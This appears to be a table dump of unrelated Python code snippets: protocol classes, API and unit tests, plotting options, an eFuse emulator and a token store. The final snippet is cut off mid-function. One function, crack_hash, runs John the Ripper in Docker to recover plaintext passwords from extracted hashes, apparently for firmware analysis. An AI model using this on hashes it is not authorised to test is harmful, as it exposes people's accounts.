code stringlengths 281 23.7M |
|---|
def load_corpus(name, download=True):
path = corpora[name]
if (not os.path.exists(path)):
raise ValueError("'{}' dataset has not been downloaded, use the download.py module to fetch datasets".format(name))
categories = [cat for cat in os.listdir(path) if os.path.isdir(os.path.join(path, cat))]
files = []
data = []
target = []
for cat in categories:
for name in os.listdir(os.path.join(path, cat)):
files.append(os.path.join(path, cat, name))
target.append(cat)
with open(os.path.join(path, cat, name), 'r') as f:
data.append(f.read())
return Bunch(categories=categories, files=files, data=data, target=target) |
class nicira_controller_role_reply(nicira_header):
version = 1
type = 4
experimenter = 8992
subtype = 11
def __init__(self, xid=None, role=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (role != None):
self.role = role
else:
self.role = 0
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!L', self.experimenter))
packed.append(struct.pack('!L', self.subtype))
packed.append(struct.pack('!L', self.role))
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = nicira_controller_role_reply()
_version = reader.read('!B')[0]
assert (_version == 1)
_type = reader.read('!B')[0]
assert (_type == 4)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
_experimenter = reader.read('!L')[0]
assert (_experimenter == 8992)
_subtype = reader.read('!L')[0]
assert (_subtype == 11)
obj.role = reader.read('!L')[0]
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.role != other.role):
return False
return True
def pretty_print(self, q):
q.text('nicira_controller_role_reply {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('role = ')
value_name_map = {0: 'NX_ROLE_OTHER', 1: 'NX_ROLE_MASTER', 2: 'NX_ROLE_SLAVE'}
if (self.role in value_name_map):
q.text(('%s(%d)' % (value_name_map[self.role], self.role)))
else:
q.text(('%#x' % self.role))
q.breakable()
q.text('}') |
def does_file_need_fix(filepath: str) -> bool:
if (not re.search('\\.pyi?$', filepath)):
return False
with open(filepath, mode='r') as f:
first_license_line = None
for line in f:
if (line == license_header_lines[0]):
first_license_line = line
break
elif (line not in lines_to_keep):
return True
for (header_line, line) in zip(license_header_lines, chain((first_license_line,), f)):
if (line != header_line):
return True
return False |
def extractDefiringCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class TestConsentVerify():
(scope='function')
def verification_code(self) -> str:
return 'abcd'
def test_consent_verify_no_consent_request_id(self, api_client):
data = {'code': '12345'}
response = api_client.post(f"{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id='non_existent_consent_id')}", json=data)
assert (response.status_code == 404)
assert ('not found' in response.json()['detail'])
.usefixtures('subject_identity_verification_required')
def test_consent_verify_no_consent_code(self, provided_identity_and_consent_request, api_client):
data = {'code': '12345'}
(_, consent_request) = provided_identity_and_consent_request
response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json=data)
assert (response.status_code == 400)
assert ('code expired' in response.json()['detail'])
.usefixtures('subject_identity_verification_required')
def test_consent_verify_invalid_code(self, provided_identity_and_consent_request, api_client):
(_, consent_request) = provided_identity_and_consent_request
consent_request.cache_identity_verification_code('abcd')
response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json={'code': '1234'})
assert (response.status_code == 403)
assert ('Incorrect identification' in response.json()['detail'])
.usefixtures('subject_identity_verification_required')
('fides.api.models.privacy_request.ConsentRequest.verify_identity')
def test_consent_verify_no_email_provided(self, mock_verify_identity: MagicMock, db, api_client, verification_code):
provided_identity_data = {'privacy_request_id': None, 'field_name': 'email', 'hashed_value': None, 'encrypted_value': None}
provided_identity = ProvidedIdentity.create(db, data=provided_identity_data)
consent_request_data = {'provided_identity_id': provided_identity.id}
consent_request = ConsentRequest.create(db, data=consent_request_data)
consent_request.cache_identity_verification_code(verification_code)
response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json={'code': verification_code})
assert (response.status_code == 404)
assert (verification_code in mock_verify_identity.call_args_list[0].args)
assert ('missing' in response.json()['detail'])
.usefixtures('subject_identity_verification_required')
('fides.api.models.privacy_request.ConsentRequest.verify_identity')
def test_consent_verify_no_consent_present(self, mock_verify_identity: MagicMock, provided_identity_and_consent_request, api_client, verification_code):
(_, consent_request) = provided_identity_and_consent_request
consent_request.cache_identity_verification_code(verification_code)
response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json={'code': verification_code})
assert (response.status_code == 200)
assert (verification_code in mock_verify_identity.call_args_list[0].args)
assert (response.json()['consent'] is None)
.usefixtures('subject_identity_verification_required')
('fides.api.models.privacy_request.ConsentRequest.verify_identity')
def test_consent_verify_consent_preferences(self, mock_verify_identity: MagicMock, provided_identity_and_consent_request, db, api_client, verification_code):
(provided_identity, consent_request) = provided_identity_and_consent_request
consent_request.cache_identity_verification_code(verification_code)
consent_data: list[dict[(str, Any)]] = [{'data_use': 'email', 'data_use_description': None, 'opt_in': True}, {'data_use': 'location', 'data_use_description': 'Location data', 'opt_in': False}]
for data in deepcopy(consent_data):
data['provided_identity_id'] = provided_identity.id
Consent.create(db, data=data)
response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json={'code': verification_code})
assert (response.status_code == 200)
assert (verification_code in mock_verify_identity.call_args_list[0].args)
expected_consent_data: list[dict[(str, Any)]] = [{'data_use': 'email', 'data_use_description': None, 'opt_in': True, 'has_gpc_flag': False, 'conflicts_with_gpc': False}, {'data_use': 'location', 'data_use_description': 'Location data', 'opt_in': False, 'has_gpc_flag': False, 'conflicts_with_gpc': False}]
assert (response.json()['consent'] == expected_consent_data)
.usefixtures('subject_identity_verification_required')
def test_verify_consent_stores_verified_at(self, provided_identity_and_consent_request, db, api_client, verification_code):
(provided_identity, consent_request) = provided_identity_and_consent_request
consent_request.cache_identity_verification_code(verification_code)
consent_data: list[dict[(str, Any)]] = [{'data_use': 'email', 'data_use_description': None, 'opt_in': True}, {'data_use': 'location', 'data_use_description': 'Location data', 'opt_in': False}]
for data in deepcopy(consent_data):
data['provided_identity_id'] = provided_identity.id
Consent.create(db, data=data)
response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json={'code': verification_code})
assert (response.status_code == 200)
expected_consent_data: list[dict[(str, Any)]] = [{'data_use': 'email', 'data_use_description': None, 'opt_in': True, 'has_gpc_flag': False, 'conflicts_with_gpc': False}, {'data_use': 'location', 'data_use_description': 'Location data', 'opt_in': False, 'has_gpc_flag': False, 'conflicts_with_gpc': False}]
assert (response.json()['consent'] == expected_consent_data)
db.refresh(consent_request)
assert (consent_request.identity_verified_at is not None) |
class TestDeletion(CustomTestCase):
uri = '/sleep'
def create_app():
app.config['TESTING'] = True
return app
def test_delete__204(self):
r1 = self.client.post(self.uri, json={'args': ['10'], 'force_unique_key': True})
r1_json = r1.get_json()
self.assertStatus(r1, 202)
r2 = self.client.delete(f"{self.uri}?key={r1_json['key']}")
self.assertStatus(r2, 204)
def test_delete__400(self):
r1 = self.client.post(self.uri, json={'args': ['10'], 'force_unique_key': True})
self.assertStatus(r1, 202)
r2 = self.client.delete(f'{self.uri}?key=')
self.assertStatus(r2, 400)
def test_delete__404(self):
r1 = self.client.post(self.uri, json={'args': ['10'], 'force_unique_key': True})
self.assertStatus(r1, 202)
r2 = self.client.delete(f'{self.uri}?key=abcdefg')
self.assertStatus(r2, 404) |
def getTaskValueIndex(taskname, valuename):
tid = (- 1)
vid = (- 1)
global Tasks
for x in range(0, len(Tasks)):
if (Tasks[x] and (type(Tasks[x]) is not bool)):
try:
if Tasks[x].enabled:
if (Tasks[x].gettaskname() == taskname):
tid = (x + 1)
for u in range(0, Tasks[x].valuecount):
if (Tasks[x].valuenames[u] == valuename):
vid = (u + 1)
return (tid, vid)
except:
pass
return (tid, vid) |
class TestCombineData(unittest.TestCase):
def setUp(self):
self.species1 = u'Probe_Set_ID\tPublic_ID\n1053_at\tM87338\n117_at\tX51757\n121_at\tX69699\n1255_g_at\tL36861\n'
self.species2 = u'Probe_Set_ID\tPublic_ID\n1417503_at\tNM_020022\n1457638_x_at\tAV039064\n1457669_x_at\tAV096765\n1418208_at\tNM_011040\n1446561_at\tBB497767\n1421061_at\tNM_008189\n1426970_a_at\tAK004894\n1426971_at\tAK004894\n1437317_at\tBB735820\n'
self.lookup_data = u'ps_1\tgid_1\tgid_2\tps_2\n1053_at\t5982\t19718\t1417503_at,1457638_x_at,1457669_x_at\n117_at\t3310\tNA\tNA\n121_at\t7849\t18510\t1418208_at,1446561_at\n1255_g_at\t2978\t14913\t1421061_at\n1294_at\t7318\t74153\t1426970_a_at,1426971_at,1437317_at\n'
self.expected_output = u'Probe_Set_ID\tPublic_ID\tProbe_Set_ID_1\tPublic_ID_1\tProbe_Set_ID_2\tPublic_ID_2\tProbe_Set_ID_3\tPublic_ID_3\n1053_at\tM87338\t1417503_at\tNM_020022\t1457638_x_at\tAV039064\t1457669_x_at\tAV096765\n117_at\tX51757\n121_at\tX69699\t1418208_at\tNM_011040\t1446561_at\tBB497767\n1255_g_at\tL36861\t1421061_at\tNM_008189\n'
def test_combine_data(self):
data1 = IndexedFile(fp=io.StringIO(self.species1), first_line_is_header=True)
data2 = IndexedFile(fp=io.StringIO(self.species2), first_line_is_header=True)
lookup = ProbeSetLookup(lookup_data_fp=io.StringIO(self.lookup_data))
output_fp = io.StringIO()
combine_data_main(data1, data2, lookup.lookup, output_fp)
self.assertEqual(output_fp.getvalue(), self.expected_output) |
class PageSettings(AbstractObject):
def __init__(self, api=None):
super(PageSettings, self).__init__()
self._isPageSettings = True
self._api = api
class Field(AbstractObject.Field):
setting = 'setting'
value = 'value'
_field_types = {'setting': 'string', 'value': 'Object'}
def _get_field_enum_info(cls):
field_enum_info = {}
return field_enum_info |
class OptionSeriesBoxplotSonificationContexttracksMappingTremoloDepth(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class ExampleDirLanguages(BaseExampleDir):
def __init__(self):
BaseExampleDir.__init__(self)
self.add_file('hello', 'Hello!')
self.add_file('goodbye', 'Goodbye!')
self.add_file('spanish/hola', 'Hello!')
self.add_file('spanish/adios', 'Goodbye!')
self.add_file('welsh/north_wales/maen_ddrwg_gen_i', 'Sorry!')
self.add_file('welsh/south_wales/maen_flin_da_fi', 'Sorry!')
self.add_file('icelandic/takk_fyrir', 'Thank you!')
self.add_link('hi', 'hello')
self.add_link('bye', 'goodbye')
self.add_dir('countries')
self.add_link('countries/spain', '../spanish')
self.add_link('countries/north_wales', '../welsh/north_wales')
self.add_link('countries/south_wales', '../welsh/south_wales')
self.add_link('countries/iceland', '../icelandic') |
def test_sequential_cooling():
calc_kwargs = {'scale': 0.01}
geom = AnaPot().get_saddles(i=0, geom_kwargs={'coord_type': 'mwcartesian'}, calc_kwargs=calc_kwargs)
calc = geom.calculator
def calc_getter():
return AnaPot(**calc_kwargs)
P = 20
T = 400
Ts = np.linspace(T, 100, num=10)
inst = Instanton.from_ts(geom, P=P, calc_getter=calc_getter)
init = list()
fin = list()
for (i, T) in enumerate(Ts):
print(f' CYCLE {i}, T={T} K')
inst = Instanton.from_instanton(inst, calc_getter=calc_getter, T=T)
init.append(inst.coords.copy())
opt = RSIRFOptimizer(inst, hessian_init='calc', hessian_recalc=5)
opt.run()
fin.append(inst.coords.copy()) |
class WMAP5BAOSNCosmology(FRWCosmology):
_params = ('t0', 'sigma8', 'omegaB', 'omegaC', 'ns')
t0 = 13.73
t0_err = 0.12
sigma8 = 0.817
sigma8_err = 0.026
ns = 0.96
ns_err = (0.013, 0.014)
H0 = 70.1
H0_err = 1.3
omegaB = 0.046
omegaB_err = 0.0015
omegaC = 0.233
omegaC_err = 0.013
omegaL = 0.721
omegaL_err = 0.015
omegaM = property((lambda self: (self.omegaB + self.omegaC)))
omegaM_err = property((lambda self: (self.omegaB_err + self.omegaC_err))) |
def test_forwarded_quote_escaping(asgi):
req = create_req(asgi, host='suchproxy02.suchtesting.com', path='/languages', root_path='doge', headers={'Forwarded': 'for="1\\.2\\.3\\.4";some="extra,\\"info\\""'})
assert (req.forwarded[0].host is None)
assert (req.forwarded[0].src == '1.2.3.4') |
class TestANSIString(TestCase):
def setUp(self):
self.example_raw = '|relectric |cboogaloo|n'
self.example_ansi = AN(self.example_raw)
self.example_str = 'electric boogaloo'
self.example_output = '\x1b[1m\x1b[31melectric \x1b[1m\x1b[36mboogaloo\x1b[0m'
def test_length(self):
self.assertEqual(len(self.example_ansi), 17)
def test_clean(self):
self.assertEqual(self.example_ansi.clean(), self.example_str)
def test_raw(self):
self.assertEqual(self.example_ansi.raw(), self.example_output)
def test_format(self):
self.assertEqual(f'{self.example_ansi:0<20}', (self.example_output + '000'))
def test_split_with_mixed_strings(self):
anstr1 = AN('Line1\nLine2')
anstr2 = AN('\n').join([AN('Line1'), AN('Line2')])
anstr3 = AN('\n').join([AN('Line1'), 'Line2'])
self.assertEqual(anstr2, anstr3)
self.assertEqual(anstr1, anstr2)
self.assertEqual(anstr1, anstr3)
split1 = anstr1.split('\n')
split2 = anstr2.split('\n')
split3 = anstr3.split('\n')
self.assertEqual(split2, split3, 'Split 2 and 3 differ')
self.assertEqual(split1, split2, 'Split 1 and 2 differ')
self.assertEqual(split1, split3, 'Split 1 and 3 differ') |
class RightToolbar(Toolbar):
ui = 'ui/coverart_rightsidebar.ui'
name = 'right'
def hide(self):
if self.builder.get_visible():
self.builder.hide()
self.plugin.shell.remove_widget(self.builder, RB.ShellUILocation.RIGHT_SIDEBAR)
def show(self):
self.plugin.shell.add_widget(self.builder, RB.ShellUILocation.RIGHT_SIDEBAR, expand=False, fill=False)
self.builder.show() |
class ManualSchema(ViewInspector):
def __init__(self, fields, description='', encoding=None):
super().__init__()
if (coreapi is not None):
warnings.warn('CoreAPI compatibility is deprecated and will be removed in DRF 3.17', RemovedInDRF317Warning)
assert all((isinstance(f, coreapi.Field) for f in fields)), '`fields` must be a list of coreapi.Field instances'
self._fields = fields
self._description = description
self._encoding = encoding
def get_link(self, path, method, base_url):
if (base_url and path.startswith('/')):
path = path[1:]
return coreapi.Link(url=parse.urljoin(base_url, path), action=method.lower(), encoding=self._encoding, fields=self._fields, description=self._description) |
_tag('django_social_share/templatetags/post_to_whatsapp.html', takes_context=True)
def post_to_whatsapp(context, obj_or_url=None, link_text='', link_class=''):
context = post_to_whatsapp_url(context, obj_or_url)
context['link_class'] = link_class
context['link_text'] = (link_text or 'Post to WhatsApp')
return context |
def test_extract_seed_nodes() -> None:
t = generate_graph_resources(3)
field(t, 'dr_1', 'ds_1', 'f1').references.append((FieldAddress('dr_2', 'ds_2', 'f1'), None))
field(t, 'dr_1', 'ds_1', 'f1').references.append((FieldAddress('dr_3', 'ds_3', 'f1'), None))
field(t, 'dr_1', 'ds_1', 'f1').identity = 'x'
graph: DatasetGraph = DatasetGraph(*t)
assert (set(graph.nodes.keys()) == {CollectionAddress('dr_1', 'ds_1'), CollectionAddress('dr_2', 'ds_2'), CollectionAddress('dr_3', 'ds_3')})
assert (graph.identity_keys == {FieldAddress('dr_1', 'ds_1', 'f1'): 'x'})
assert (graph.edges == {BidirectionalEdge(FieldAddress('dr_1', 'ds_1', 'f1'), FieldAddress('dr_2', 'ds_2', 'f1')), BidirectionalEdge(FieldAddress('dr_1', 'ds_1', 'f1'), FieldAddress('dr_3', 'ds_3', 'f1'))})
traversal = Traversal(graph, {'x': 1})
assert (traversal.root_node.children.keys() == {CollectionAddress('dr_1', 'ds_1')}) |
class EmulateEfuseController(EmulateEfuseControllerBase):
CHIP_NAME = 'ESP32-S3'
mem = None
debug = False
def __init__(self, efuse_file=None, debug=False):
self.Blocks = EfuseDefineBlocks
self.Fields = EfuseDefineFields()
self.REGS = EfuseDefineRegisters
super(EmulateEfuseController, self).__init__(efuse_file, debug)
self.write_reg(self.REGS.EFUSE_CMD_REG, 0)
' esptool method start >>'
def get_major_chip_version(self):
return 0
def get_minor_chip_version(self):
return 2
def get_crystal_freq(self):
return 40
def get_security_info(self):
return {'flags': 0, 'flash_crypt_cnt': 0, 'key_purposes': 0, 'chip_id': 0, 'api_version': 0}
' << esptool method end '
def handle_writing_event(self, addr, value):
if (addr == self.REGS.EFUSE_CMD_REG):
if (value & self.REGS.EFUSE_PGM_CMD):
self.copy_blocks_wr_regs_to_rd_regs(updated_block=((value >> 2) & 15))
self.clean_blocks_wr_regs()
self.check_rd_protection_area()
self.write_reg(addr, 0)
self.write_reg(self.REGS.EFUSE_CMD_REG, 0)
elif (value == self.REGS.EFUSE_READ_CMD):
self.write_reg(addr, 0)
self.write_reg(self.REGS.EFUSE_CMD_REG, 0)
self.save_to_file()
def get_bitlen_of_block(self, blk, wr=False):
if (blk.id == 0):
if wr:
return (32 * 8)
else:
return (32 * blk.len)
elif wr:
rs_coding = (32 * 3)
return ((32 * 8) + rs_coding)
else:
return (32 * blk.len)
def handle_coding_scheme(self, blk, data):
if (blk.id != 0):
coded_bytes = 12
data.pos = (coded_bytes * 8)
plain_data = data.readlist('32*uint:8')[::(- 1)]
rs = reedsolo.RSCodec(coded_bytes)
calc_encoded_data = list(rs.encode([x for x in plain_data]))
data.pos = 0
if (calc_encoded_data != data.readlist('44*uint:8')[::(- 1)]):
raise FatalError('Error in coding scheme data')
data = data[(coded_bytes * 8):]
if (blk.len < 8):
data = data[((8 - blk.len) * 32):]
return data |
class NeverMatch(Field):
errors = {'never': 'This never validates.'}
def __init__(self, **kwargs: typing.Any) -> None:
assert ('allow_null' not in kwargs)
super().__init__(**kwargs)
def validate(self, value: typing.Any) -> typing.Any:
raise self.validation_error('never') |
class SoftThreadPool():
def __init__(self, nthreads=4):
self._nthreads = nthreads
self._queue = []
self._condition = threading.Condition()
self._active = False
self._lock = threading.RLock()
self._error = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown(exc_type)
def start(self):
with self._lock:
self._active = True
for _ in range(self._nthreads):
SoftThread(self._queue, self._condition).start()
def shutdown(self, error=None):
with self._lock:
if (not self._active):
return
for _ in range(self._nthreads):
with self._condition:
self._queue.append(None)
self._condition.notify_all()
with self._lock:
self._active = False
self._error = error
def submit(self, func, *args, **kwargs):
with self._lock:
if (not self._active):
self.start()
with self._condition:
s = Future(func, args, kwargs)
self._queue.append(s)
self._condition.notify_all()
return s
def __call__(self):
with self._lock:
if self._error:
raise self._error |
class RedisStrategy(Strategy[(models.UP, models.ID)], Generic[(models.UP, models.ID)]):
def __init__(self, redis: redis.asyncio.Redis, lifetime_seconds: Optional[int]=None, *, key_prefix: str='fastapi_users_token:'):
self.redis = redis
self.lifetime_seconds = lifetime_seconds
self.key_prefix = key_prefix
async def read_token(self, token: Optional[str], user_manager: BaseUserManager[(models.UP, models.ID)]) -> Optional[models.UP]:
if (token is None):
return None
user_id = (await self.redis.get(f'{self.key_prefix}{token}'))
if (user_id is None):
return None
try:
parsed_id = user_manager.parse_id(user_id)
return (await user_manager.get(parsed_id))
except (exceptions.UserNotExists, exceptions.InvalidID):
return None
async def write_token(self, user: models.UP) -> str:
token = secrets.token_urlsafe()
(await self.redis.set(f'{self.key_prefix}{token}', str(user.id), ex=self.lifetime_seconds))
return token
async def destroy_token(self, token: str, user: models.UP) -> None:
(await self.redis.delete(f'{self.key_prefix}{token}')) |
def complete(service, task_token, return_value: object) -> Optional[Exception]:
respond = RespondActivityTaskCompletedRequest()
respond.task_token = task_token
respond.result = json.dumps(return_value)
respond.identity = WorkflowService.get_identity()
(_, error) = service.respond_activity_task_completed(respond)
return error |
def test_des_not_too_slowed_down():
n = 10000
data_u8 = np.zeros((n, 8), dtype='uint8')
data_u32 = np.zeros((n, 8), dtype='uint32')
key = np.zeros(16, dtype='uint8')
t0 = time.process_time()
scared.des.encrypt(data_u8, key)
pt_u8 = (time.process_time() - t0)
t0 = time.process_time()
scared.des.encrypt(data_u32, key)
pt_u32 = (time.process_time() - t0)
assert (pt_u32 < (1.5 * pt_u8)) |
def templated(template_name):
def decorator(func):
(func)
def decorated_function(*args, **kwargs):
ctx = func(*args, **kwargs)
if (ctx is None):
ctx = {}
elif (not isinstance(ctx, dict)):
return ctx
return render_template(template_name, **ctx)
return decorated_function
return decorator |
class TestJobRequestSchema():
()
def job(self):
return {'control': {'continue_on_error': False}, 'context': {'switches': [1, 2, 3], 'correlation_id': six.u(str(uuid.uuid4()))}, 'actions': [{'action': 'test_action_name', 'body': {'first_name': 'Bob', 'last_name': 'Mueller'}}]}
def test_valid_job(self, job):
errors = JobRequestSchema.errors(job)
assert (not errors)
def test_missing_control(self, job):
del job['control']
errors = JobRequestSchema.errors(job)
assert (len(errors) == 1)
assert (errors[0].pointer == 'control')
def test_invalid_control(self, job):
job['control'] = 'invalid control type'
errors = JobRequestSchema.errors(job)
assert (len(errors) == 1)
assert (errors[0].pointer == 'control')
def test_missing_actions(self, job):
del job['actions']
errors = JobRequestSchema.errors(job)
assert (len(errors) == 1)
assert (errors[0].pointer == 'actions')
def test_invalid_actions(self, job):
job['actions'] = 'invalid actions type'
errors = JobRequestSchema.errors(job)
assert (len(errors) == 1)
assert (errors[0].pointer == 'actions')
def test_empty_actions(self, job):
job['actions'] = []
errors = JobRequestSchema.errors(job)
assert (len(errors) == 1)
assert (errors[0].pointer == 'actions') |
class TestActionFileDeleteSnapshots(CuratorTestCase):
def test_deletesnapshot(self):
self.create_repository()
timestamps = []
for i in range(1, 4):
self.add_docs(f'my_index{i}')
ilo = IndexList(self.client)
snap = Snapshot(ilo, repository=self.args['repository'], name='curator-%Y%m%d%H%M%S', wait_interval=0.5)
snap.do_action()
snapshot = get_snapshot(self.client, self.args['repository'], '*')
assert (i == len(snapshot['snapshots']))
time.sleep(1.0)
timestamps.append(int(time.time()))
time.sleep(1.0)
self.write_config(self.args['configfile'], testvars.client_config.format(HOST))
self.write_config(self.args['actionfile'], testvars.delete_snap_proto.format(self.args['repository'], 'age', 'creation_date', 'older', ' ', 'seconds', '0', timestamps[0]))
self.invoke_runner()
snapshot = get_snapshot(self.client, self.args['repository'], '*')
assert (2 == len(snapshot['snapshots']))
def test_no_repository(self):
self.write_config(self.args['configfile'], testvars.client_config.format(HOST))
self.write_config(self.args['actionfile'], testvars.delete_snap_proto.format(' ', 'age', 'creation_date', 'older', ' ', 'seconds', '0', ' '))
self.invoke_runner()
assert (1 == self.result.exit_code)
def test_extra_options(self):
self.write_config(self.args['configfile'], testvars.client_config.format(HOST))
self.write_config(self.args['actionfile'], testvars.bad_option_proto_test.format('delete_snapshots'))
self.invoke_runner()
assert (1 == self.result.exit_code) |
()
def add_multiple_service_units(parent, data):
if ((not parent) or (not data)):
return
data = json.loads(data)
company = (data.get('company') or frappe.defaults.get_defaults().get('company') or frappe.db.get_single_value('Global Defaults', 'default_company'))
if ((not data.get('healthcare_service_unit_name')) or (not company)):
frappe.throw(_('Service Unit Name and Company are mandatory to create Healthcare Service Units'), title=_('Missing Required Fields'))
count = cint((data.get('count') or 0))
if (count <= 0):
frappe.throw(_('Number of Service Units to be created should at least be 1'), title=_('Invalid Number of Service Units'))
capacity = cint((data.get('service_unit_capacity') or 1))
service_unit = {'doctype': 'Healthcare Service Unit', 'parent_healthcare_service_unit': parent, 'service_unit_type': (data.get('service_unit_type') or None), 'service_unit_capacity': (capacity if (capacity > 0) else 1), 'warehouse': (data.get('warehouse') or None), 'company': company}
service_unit_name = '{}'.format(data.get('healthcare_service_unit_name').strip(' -'))
last_suffix = frappe.db.sql('SELECT\n\t\tIFNULL(MAX(CAST(SUBSTRING(name FROM %(start)s FOR 4) AS UNSIGNED)), 0)\n\t\tFROM `tabHealthcare Service Unit`\n\t\tWHERE name like %(prefix)s AND company=%(company)s', {'start': (len(service_unit_name) + 2), 'prefix': '{}-%'.format(service_unit_name), 'company': company}, as_list=1)[0][0]
start_suffix = (cint(last_suffix) + 1)
failed_list = []
for i in range(start_suffix, (count + start_suffix)):
service_unit['healthcare_service_unit_name'] = '{}-{}'.format(service_unit_name, cstr(('%0*d' % (4, i))))
service_unit_doc = frappe.get_doc(service_unit)
try:
service_unit_doc.insert()
except Exception:
failed_list.append(service_unit['healthcare_service_unit_name'])
return failed_list |
def crack_hash(passwd_entry: bytes, result_entry: dict, format_term: str='') -> bool:
with NamedTemporaryFile() as fp:
fp.write(passwd_entry)
fp.seek(0)
john_process = run_docker_container('fact/john:alpine-3.18', command=f'/work/input_file {format_term}', mounts=[Mount('/work/input_file', fp.name, type='bind'), Mount('/root/.john/john.pot', str(JOHN_POT), type='bind')], logging_label='users_and_passwords')
result_entry['log'] = john_process.stdout
if ('No password hashes loaded' in john_process.stdout):
result_entry['ERROR'] = 'hash type is not supported'
return False
output = parse_john_output(john_process.stdout)
if output:
if any((('0 password hashes cracked' in line) for line in output)):
result_entry['ERROR'] = 'password cracking not successful'
return False
with suppress(IndexError):
result_entry['password'] = output[0].split(':')[1]
return True
return False |
class OptionSeriesBarSonificationTracks(Options):
def activeWhen(self) -> 'OptionSeriesBarSonificationTracksActivewhen':
return self._config_sub_data('activeWhen', OptionSeriesBarSonificationTracksActivewhen)
def instrument(self):
return self._config_get('piano')
def instrument(self, text: str):
self._config(text, js_type=False)
def mapping(self) -> 'OptionSeriesBarSonificationTracksMapping':
return self._config_sub_data('mapping', OptionSeriesBarSonificationTracksMapping)
def midiName(self):
return self._config_get(None)
def midiName(self, text: str):
self._config(text, js_type=False)
def pointGrouping(self) -> 'OptionSeriesBarSonificationTracksPointgrouping':
return self._config_sub_data('pointGrouping', OptionSeriesBarSonificationTracksPointgrouping)
def roundToMusicalNotes(self):
return self._config_get(True)
def roundToMusicalNotes(self, flag: bool):
self._config(flag, js_type=False)
def showPlayMarker(self):
return self._config_get(True)
def showPlayMarker(self, flag: bool):
self._config(flag, js_type=False)
def type(self):
return self._config_get('instrument')
def type(self, text: str):
self._config(text, js_type=False) |
def get_channel_path(view):
params = {}
params['ParentId'] = view.get('Id')
params['IsMissing'] = False
params['ImageTypeLimit'] = 1
params['Fields'] = '{field_filters}'
path = get_emby_url('{server}/emby/Users/{userid}/Items', params)
url = (((sys.argv[0] + '?url=') + urllib.parse.quote(path)) + '&mode=GET_CONTENT&media_type=files')
return url |
(stability='beta')
class ModelRequest():
model: str
messages: List[_ModelMessageType]
temperature: Optional[float] = None
max_new_tokens: Optional[int] = None
stop: Optional[str] = None
stop_token_ids: Optional[List[int]] = None
context_len: Optional[int] = None
echo: Optional[bool] = True
span_id: Optional[str] = None
context: Optional[ModelRequestContext] = field(default_factory=(lambda : ModelRequestContext()))
def stream(self) -> bool:
return (self.context and self.context.stream)
def copy(self):
new_request = copy.deepcopy(self)
new_request.messages = list(map((lambda m: (m if isinstance(m, ModelMessage) else ModelMessage(**m))), new_request.messages))
return new_request
def to_dict(self) -> Dict[(str, Any)]:
new_reqeust = copy.deepcopy(self)
new_reqeust.messages = list(map((lambda m: (m if isinstance(m, dict) else m.dict())), new_reqeust.messages))
return {k: v for (k, v) in asdict(new_reqeust).items() if v}
def get_messages(self) -> List[ModelMessage]:
return list(map((lambda m: (m if isinstance(m, ModelMessage) else ModelMessage(**m))), self.messages))
def get_single_user_message(self) -> Optional[ModelMessage]:
messages = self.get_messages()
if ((len(messages) != 1) and (messages[0].role != ModelMessageRoleType.HUMAN)):
raise ValueError('The messages is not a single user message')
return messages[0]
def _build(model: str, prompt: str, **kwargs):
return ModelRequest(model=model, messages=[ModelMessage(role=ModelMessageRoleType.HUMAN, content=prompt)], **kwargs)
def to_openai_messages(self) -> List[Dict[(str, Any)]]:
messages = [(m if isinstance(m, ModelMessage) else ModelMessage(**m)) for m in self.messages]
return ModelMessage.to_openai_messages(messages) |
class ConstantField():
def __init__(self, date, param, proc, shape, number=None):
self.date = date
self.param = param
self.number = number
self.proc = proc
self.shape = shape
self._metadata = dict(valid_datetime=(date if isinstance(date, str) else date.isoformat()), param=param, level=None, levelist=None, number=number)
def to_numpy(self, reshape=True, dtype=None):
values = self.proc(self.date)
if reshape:
values = values.reshape(self.shape)
if (dtype is not None):
values = values.astype(dtype)
return values
def __repr__(self):
return ('ConstantField(%s,%s,%s)' % (self.param, self.date, self.number))
def metadata(self, name):
return self._metadata[name] |
class Member(User):
def __init__(self, raw, group):
super(Member, self).__init__(raw, group.bot)
self._group_user_name = group.user_name
def group(self):
for _group in self.bot.groups():
if (_group.user_name == self._group_user_name):
return _group
raise Exception('failed to find the group belong to')
def display_name(self):
return self.raw.get('DisplayName')
def remove(self):
